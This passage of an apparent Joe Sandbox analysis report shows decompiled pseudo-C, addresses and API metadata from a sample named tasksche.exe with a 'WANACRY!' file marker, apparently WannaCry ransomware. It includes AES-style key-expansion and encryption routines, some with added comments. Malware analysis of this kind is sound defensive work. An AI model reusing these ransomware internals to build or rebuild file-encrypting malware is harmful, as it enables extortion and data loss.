                                                                                                                                                					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                                                                                                                					_push(0x40d570);
                                                                                                                                                					_push( &_v24);
                                                                                                                                                					L0040776E();
                                                                                                                                                				}
                                                                                                                                                				_t283 = _a12;
                                                                                                                                                				_t252 = 0x18;
                                                                                                                                                				_t342 = 0x10;
                                                                                                                                                				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
                                                                                                                                                					_t283 =  &_v24;
                                                                                                                                                					_a8 = 0x40f57c;
                                                                                                                                                					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                                                                                                                					_push(0x40d570);
                                                                                                                                                					_push( &_v24);
                                                                                                                                                					L0040776E();
                                                                                                                                                				}
                                                                                                                                                				_t193 = _a16;
                                                                                                                                                				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
                                                                                                                                                					_t283 =  &_v24;
                                                                                                                                                					_a8 = 0x40f57c;
                                                                                                                                                					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                                                                                                                					_t193 =  &_v24;
                                                                                                                                                					_push(0x40d570);
                                                                                                                                                					_push(_t193);
                                                                                                                                                					L0040776E();
                                                                                                                                                				}
                                                                                                                                                				 *(_t352 + 0x3cc) = _t193;
                                                                                                                                                				 *(_t352 + 0x3c8) = _t283;
                                                                                                                                                				memcpy(_t352 + 0x3d0, _a8, _t193);
                                                                                                                                                				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
                                                                                                                                                				_t198 =  *(_t352 + 0x3c8);
                                                                                                                                                				_t354 = _t353 + 0x18;
                                                                                                                                                				if(_t198 == _t342) {
                                                                                                                                                					_t199 =  *(_t352 + 0x3cc);
                                                                                                                                                					if(_t199 != _t342) {
                                                                                                                                                						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
                                                                                                                                                					} else {
                                                                                                                                                						_t200 = 0xa;
                                                                                                                                                					}
                                                                                                                                                					goto L17;
                                                                                                                                                				} else {
                                                                                                                                                					if(_t198 == _t252) {
                                                                                                                                                						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
                                                                                                                                                						L17:
                                                                                                                                                						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
                                                                                                                                                						L18:
                                                                                                                                                						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}
0x00402a83
0x00402a85
0x00402a8e
0x00402a95
0x00402a9e
0x00402aa3
0x00402aa4
0x00402aa4
0x00402aa9
0x00402aae
0x00402ab1
0x00402ab4
0x00402ac2
0x00402ac6
0x00402acd
0x00402ad6
0x00402adb
0x00402adc
0x00402adc
0x00402ae1
0x00402ae6
0x00402af4
0x00402af8
0x00402aff
0x00402b05
0x00402b08
0x00402b0d
0x00402b0e
0x00402b0e
0x00402b14
0x00402b23
0x00402b2a
0x00402b3f
                                                                                                                                                0x00402b44
                                                                                                                                                0x00402b4a
                                                                                                                                                0x00402b4f
                                                                                                                                                0x00402b75
                                                                                                                                                0x00402b7d
                                                                                                                                                0x00402b92
                                                                                                                                                0x00402b7f
                                                                                                                                                0x00402b81
                                                                                                                                                0x00402b81
                                                                                                                                                0x00000000
                                                                                                                                                0x00402b51
                                                                                                                                                0x00402b53
                                                                                                                                                0x00402b70
                                                                                                                                                0x00402b94
                                                                                                                                                0x00402b94
                                                                                                                                                0x00402b9a
                                                                                                                                                0x00402ba2
                                                                                                                                                0x00402ba3
                                                                                                                                                0x00402ba6
                                                                                                                                                0x00402bae
                                                                                                                                                0x00402bb1
                                                                                                                                                0x00402bcf
                                                                                                                                                0x00402bcf
                                                                                                                                                0x00402bd7
                                                                                                                                                0x00402bf8
                                                                                                                                                0x00402c00
                                                                                                                                                0x00402c01
                                                                                                                                                0x00402c0b
                                                                                                                                                0x00402c0e
                                                                                                                                                0x00402c12
                                                                                                                                                0x00402c15
                                                                                                                                                0x00402c17
                                                                                                                                                0x00402c1f
                                                                                                                                                0x00402c22
                                                                                                                                                0x00402c4e
                                                                                                                                                0x00402c4e
                                                                                                                                                0x00402c54
                                                                                                                                                0x00402ca5
                                                                                                                                                0x00402ca8
                                                                                                                                                0x00402e04
                                                                                                                                                0x00402e06
                                                                                                                                                0x00402e0d
                                                                                                                                                0x00402e10
                                                                                                                                                0x00402e73
                                                                                                                                                0x00402e73
                                                                                                                                                0x00402e7b
                                                                                                                                                0x00402e7b
                                                                                                                                                0x00402e18
                                                                                                                                                0x00402e1b
                                                                                                                                                0x00402e1b
                                                                                                                                                0x00402e20
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402e22
                                                                                                                                                0x00402e25
                                                                                                                                                0x00402e25
                                                                                                                                                0x00402e29
                                                                                                                                                0x00402e59
                                                                                                                                                0x00402e5b
                                                                                                                                                0x00402e5e
                                                                                                                                                0x00402e5e
                                                                                                                                                0x00402e61
                                                                                                                                                0x00402e61
                                                                                                                                                0x00402e64
                                                                                                                                                0x00402e68
                                                                                                                                                0x00402e6b
                                                                                                                                                0x00000000
                                                                                                                                                0x00402e1b
                                                                                                                                                0x00402cae
                                                                                                                                                0x00402cb5
                                                                                                                                                0x00402cb5
                                                                                                                                                0x00402cbf
                                                                                                                                                0x00402d05
                                                                                                                                                0x00402d0b
                                                                                                                                                0x00402d11
                                                                                                                                                0x00402d34
                                                                                                                                                0x00402d3a
                                                                                                                                                0x00402d3b
                                                                                                                                                0x00402d3e
                                                                                                                                                0x00402d40
                                                                                                                                                0x00402d43
                                                                                                                                                0x00402d43
                                                                                                                                                0x00402d46
                                                                                                                                                0x00402d4e
                                                                                                                                                0x00402d8f
                                                                                                                                                0x00402d95
                                                                                                                                                0x00402d9b
                                                                                                                                                0x00402d9c
                                                                                                                                                0x00402d9f
                                                                                                                                                0x00402da1
                                                                                                                                                0x00402da4
                                                                                                                                                0x00402da4
                                                                                                                                                0x00402da7
                                                                                                                                                0x00402da7
                                                                                                                                                0x00402dad
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402daf
                                                                                                                                                0x00402db5
                                                                                                                                                0x00402dbf
                                                                                                                                                0x00402dc3
                                                                                                                                                0x00402dc8
                                                                                                                                                0x00402dc9
                                                                                                                                                0x00402dcf
                                                                                                                                                0x00402ddb
                                                                                                                                                0x00402dde
                                                                                                                                                0x00402de4
                                                                                                                                                0x00402de6
                                                                                                                                                0x00402de9
                                                                                                                                                0x00402dec
                                                                                                                                                0x00402df3
                                                                                                                                                0x00402df9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402df9
                                                                                                                                                0x00000000
                                                                                                                                                0x00402db5
                                                                                                                                                0x00402d16
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402d1c
                                                                                                                                                0x00402d22
                                                                                                                                                0x00402d25
                                                                                                                                                0x00402d28
                                                                                                                                                0x00402d2a
                                                                                                                                                0x00402d2d
                                                                                                                                                0x00402d2d
                                                                                                                                                0x00000000
                                                                                                                                                0x00402dfb
                                                                                                                                                0x00402dfb
                                                                                                                                                0x00000000
                                                                                                                                                0x00402cb5
                                                                                                                                                0x00402c56
                                                                                                                                                0x00402c5c
                                                                                                                                                0x00402c6a
                                                                                                                                                0x00402c6e
                                                                                                                                                0x00402c74
                                                                                                                                                0x00402c75
                                                                                                                                                0x00402c7e
                                                                                                                                                0x00402c8b
                                                                                                                                                0x00402c91
                                                                                                                                                0x00402c93
                                                                                                                                                0x00402c96
                                                                                                                                                0x00402c9d
                                                                                                                                                0x00402ca3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402ca3
                                                                                                                                                0x00000000
                                                                                                                                                0x00402c5c
                                                                                                                                                0x00402c24
                                                                                                                                                0x00402c27
                                                                                                                                                0x00402c2d
                                                                                                                                                0x00402c2e
                                                                                                                                                0x00402c36
                                                                                                                                                0x00402c3f
                                                                                                                                                0x00402c43
                                                                                                                                                0x00402c45
                                                                                                                                                0x00402c46
                                                                                                                                                0x00402c49
                                                                                                                                                0x00402c49
                                                                                                                                                0x00402c49
                                                                                                                                                0x00000000
                                                                                                                                                0x00402c27
                                                                                                                                                0x00402bd9
                                                                                                                                                0x00402bdf
                                                                                                                                                0x00402bdf
                                                                                                                                                0x00402be4
                                                                                                                                                0x00402bea
                                                                                                                                                0x00402bea
                                                                                                                                                0x00402bea
                                                                                                                                                0x00402bec
                                                                                                                                                0x00402bed
                                                                                                                                                0x00402bf0
                                                                                                                                                0x00000000
                                                                                                                                                0x00402bdf
                                                                                                                                                0x00402bb3
                                                                                                                                                0x00402bb6
                                                                                                                                                0x00402bb6
                                                                                                                                                0x00402bbb
                                                                                                                                                0x00402bc1
                                                                                                                                                0x00402bc1
                                                                                                                                                0x00402bc1
                                                                                                                                                0x00402bc3
                                                                                                                                                0x00402bc4
                                                                                                                                                0x00402bc7
                                                                                                                                                0x00000000
                                                                                                                                                0x00402bb6
                                                                                                                                                0x00402b55
                                                                                                                                                0x00000000
                                                                                                                                                0x00402b55

APIs
• ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
• _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
• ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
• _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
• ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
• _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
• memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
• memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
Strings
Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??0exception@@ExceptionThrow$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1881450474-3916222277
                                                                                                                                                • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                                                                                • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                                                                                                                                                • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                                                                                • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                                                                                                                                                • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                                                                                                                                                • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                                                                                                                                                • String ID: WANACRY!
                                                                                                                                                • API String ID: 283026544-1240840912
                                                                                                                                                • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                                                                                • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                                                                                                                                                • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                                                                                • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 55%
                                                                                                                                                			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				signed char _v16;
                                                                                                                                                				signed int _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				char _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				signed int _v44;
                                                                                                                                                				char _v56;
                                                                                                                                                				signed int _t150;
                                                                                                                                                				signed int _t151;
                                                                                                                                                				signed int _t155;
                                                                                                                                                				signed int* _t157;
                                                                                                                                                				signed char _t158;
                                                                                                                                                				intOrPtr _t219;
                                                                                                                                                				signed int _t230;
                                                                                                                                                				signed char* _t236;
                                                                                                                                                				signed char* _t237;
                                                                                                                                                				signed char* _t238;
                                                                                                                                                				signed char* _t239;
                                                                                                                                                				signed int* _t240;
                                                                                                                                                				signed char* _t242;
                                                                                                                                                				signed char* _t243;
                                                                                                                                                				signed char* _t245;
                                                                                                                                                				signed int _t260;
                                                                                                                                                				signed int* _t273;
                                                                                                                                                				signed int _t274;
                                                                                                                                                				void* _t275;
                                                                                                                                                				void* _t276;
                                                                                                                                                
                                                                                                                                                				_t275 = __ecx;
                                                                                                                                                 				// Refuses to run before the object is initialised: if the flag at this+4 is
                                                                                                                                                 				// clear it builds an MSVCRT exception (string at 0x40f570) and raises it
                                                                                                                                                 				// through _CxxThrowException (L0040776E).
                                                                                                                                                 				if( *((char*)(__ecx + 4)) == 0) {
                                                                                                                                                					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                                                                                                                					_push(0x40d570);
                                                                                                                                                					_push( &_v56);
                                                                                                                                                					L0040776E();
                                                                                                                                                				}
                                                                                                                                                 				// Block size in bytes is kept at this+0x3cc. 16-byte blocks are handed to the
                                                                                                                                                 				// dedicated routine E00402E7E; the code below handles the 24- and 32-byte cases.
                                                                                                                                                 				_t150 =  *(_t275 + 0x3cc);
                                                                                                                                                 				if(_t150 == 0x10) {
                                                                                                                                                					return E00402E7E(_t275, _a4, _a8);
                                                                                                                                                				}
                                                                                                                                                 				// _t274 = block size / 4 = number of 32-bit columns (Nb). The cdq/sbb idiom picks
                                                                                                                                                 				// row 1 of a 32-byte-stride table at 0x40bc24 for Nb == 6 and row 2 for Nb == 8; the
                                                                                                                                                 				// three loads are consistent with Rijndael's per-block-size ShiftRows offsets for
                                                                                                                                                 				// rows 1..3 (used below as the column rotation amounts).
                                                                                                                                                 				asm("cdq");
                                                                                                                                                 				_t230 = 4;
                                                                                                                                                 				_t151 = _t150 / _t230;
                                                                                                                                                 				_t274 = _t151;
                                                                                                                                                 				asm("sbb eax, eax");
                                                                                                                                                 				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                                                                                                                 				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
                                                                                                                                                 				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
                                                                                                                                                 				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
                                                                                                                                                				_t157 = _t275 + 0x454;
                                                                                                                                                 				// Load each input column big-endian into the state array at this+0x454 and XOR it
                                                                                                                                                 				// with round key 0 (the expanded key starts at this+8, 8 words per round).
                                                                                                                                                 				if(_t274 > 0) {
                                                                                                                                                					_v16 = _t274;
                                                                                                                                                					_v8 = _t275 + 8;
                                                                                                                                                					_t242 = _a4;
                                                                                                                                                					do {
                                                                                                                                                						_t243 =  &(_t242[1]);
                                                                                                                                                						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                                                                                                                						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                                                                                                                						_t245 =  &(_t243[2]);
                                                                                                                                                						_t273 = _t157;
                                                                                                                                                						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                                                                                                                						_v8 = _v8 + 4;
                                                                                                                                                						_t242 =  &(_t245[1]);
                                                                                                                                                						_t157 =  &(_t157[1]);
                                                                                                                                                						 *_t273 =  *_t273 ^  *_v8;
                                                                                                                                                						_t27 =  &_v16;
                                                                                                                                                						 *_t27 = _v16 - 1;
                                                                                                                                                					} while ( *_t27 != 0);
                                                                                                                                                				}
                                                                                                                                                				_t158 = 1;
                                                                                                                                                				_v16 = _t158;
                                                                                                                                                 				// Rounds 1 .. Nr-1 (Nr is kept at this+0x410). Each output column is the XOR of
                                                                                                                                                 				// four 1 KiB lookup tables (0x408bfc, 0x408ffc, 0x4093fc, 0x4097fc, one per byte
                                                                                                                                                 				// position, i.e. T-tables) indexed by the row-rotated state, plus the round key.
                                                                                                                                                 				// The result is built in this+0x434 and then memcpy'd back over the state. The
                                                                                                                                                 				// decompiler has collapsed three of the four table indices into bare addresses.
                                                                                                                                                 				if( *(_t275 + 0x410) > _t158) {
                                                                                                                                                 					_v12 = _t275 + 0x28;
                                                                                                                                                					do {
                                                                                                                                                						if(_t274 > 0) {
                                                                                                                                                							_t34 =  &_v28; // 0x403b51
                                                                                                                                                							_t260 =  *_t34;
                                                                                                                                                							_v8 = _v12;
                                                                                                                                                							_a4 = _t260;
                                                                                                                                                							_v36 = _v24 - _t260;
                                                                                                                                                							_t240 = _t275 + 0x434;
                                                                                                                                                							_v40 = _v32 - _t260;
                                                                                                                                                							_v20 = _t274;
                                                                                                                                                							do {
                                                                                                                                                								asm("cdq");
                                                                                                                                                								_v44 = 0;
                                                                                                                                                								asm("cdq");
                                                                                                                                                								asm("cdq");
                                                                                                                                                								_v8 = _v8 + 4;
                                                                                                                                                								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
                                                                                                                                                								_t240 =  &(_t240[1]);
                                                                                                                                                								_a4 = _a4 + 1;
                                                                                                                                                								_t84 =  &_v20;
                                                                                                                                                								 *_t84 = _v20 - 1;
                                                                                                                                                							} while ( *_t84 != 0);
                                                                                                                                                						}
                                                                                                                                                						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                                                                                                                						_v12 = _v12 + 0x20;
                                                                                                                                                						_t276 = _t276 + 0xc;
                                                                                                                                                						_v16 = _v16 + 1;
                                                                                                                                                						_t158 = _v16;
                                                                                                                                                					} while (_t158 <  *(_t275 + 0x410));
                                                                                                                                                				}
                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                 				// Final round: byte table at 0x4089fc (S-box, no MixColumns) applied to the
                                                                                                                                                 				// row-rotated state, XORed with the last round key, written out byte by byte.
                                                                                                                                                 				if(_t274 > 0) {
                                                                                                                                                					_t236 = _a8;
                                                                                                                                                					_t219 = _v24;
                                                                                                                                                					_a8 = _t275 + 0x454;
                                                                                                                                                					_t100 =  &_v28; // 0x403b51
                                                                                                                                                					_v44 =  *_t100 - _t219;
                                                                                                                                                					_v40 = _v32 - _t219;
                                                                                                                                                					do {
                                                                                                                                                						_a8 =  &(_a8[4]);
                                                                                                                                                						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                                                                                                                						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
                                                                                                                                                						_t237 =  &(_t236[1]);
                                                                                                                                                						asm("cdq");
                                                                                                                                                						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
                                                                                                                                                						asm("cdq");
                                                                                                                                                						_t238 =  &(_t237[1]);
                                                                                                                                                						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
                                                                                                                                                						_t239 =  &(_t238[1]);
                                                                                                                                                						asm("cdq");
                                                                                                                                                						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
                                                                                                                                                						 *_t239 = _t158;
                                                                                                                                                						_t236 =  &(_t239[1]);
                                                                                                                                                						_v8 = _v8 + 1;
                                                                                                                                                						_t219 = _t219 + 1;
                                                                                                                                                					} while (_v8 < _t274);
                                                                                                                                                				}
                                                                                                                                                				return _t158;
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                                                                                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                                                                                • String ID: $Q;@
                                                                                                                                                • API String ID: 2382887404-262343263
                                                                                                                                                • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                                                                                • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                                                                                                                                                • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                                                                                • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				signed char _v16;
                                                                                                                                                				signed int _v20;
                                                                                                                                                				intOrPtr _v24;
